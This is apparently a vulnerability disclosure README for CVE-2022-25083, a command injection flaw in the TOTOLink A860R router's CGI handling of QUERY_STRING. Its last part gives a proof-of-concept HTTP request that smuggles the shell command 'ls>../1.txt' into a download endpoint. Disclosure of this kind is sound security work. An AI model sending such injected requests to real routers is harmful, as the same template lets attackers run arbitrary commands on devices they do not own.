Headline
CVE-2022-25083: IOT_vuln/README.md at main · EPhaha/IOT_vuln
TOTOLink A860R V4.1.2cu.5182_B20201027 was discovered to contain a command injection vulnerability in the “Main” function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.
Permalink
Cannot retrieve contributors at this time
TOTOLink A860R V4.1.2cu.5182_B20201027 Has an command injection vulnerability****Overview
- Type: command injection vulnerability
- Vendor: TOTOLINK (https://www.totolink.net/)
- Products: WiFi Router, such as A860R V4.1.2cu.5182_B20201027
- Firmware download address: http://www.totolink.cn/home/menu/detail.html?menu_listtpl=download&id=62&ids=36
Description****1.Product Information:
TOTOLink A860R V4.1.2cu.5182_B20201027 router, the latest version of simulation overview:
The latest version on the official website)
2. Vulnerability details
TOTOLINK A860R V4.1.2cu.5182_B20201027 was discovered to contain a command injection vulnerability in the “Main” function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.
We can see that the os will get QUERY_STRING
without filter splice to the string echo QUERY_STRING:%s >/tmp/download
and execute it. So, If we can control the QUERY_STRING
, it can be command injection.
3. Recurring vulnerabilities and POC
In order to reproduce the vulnerability, the following steps can be followed:
Boot the firmware by qemu-system or other ways (real machine)
Attack with the following POC attacks
GET /cgi-bin/downloadFlile.cgi?payload=
ls>../1.txt
HTTP/1.1 Host: 192.168.111.12 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0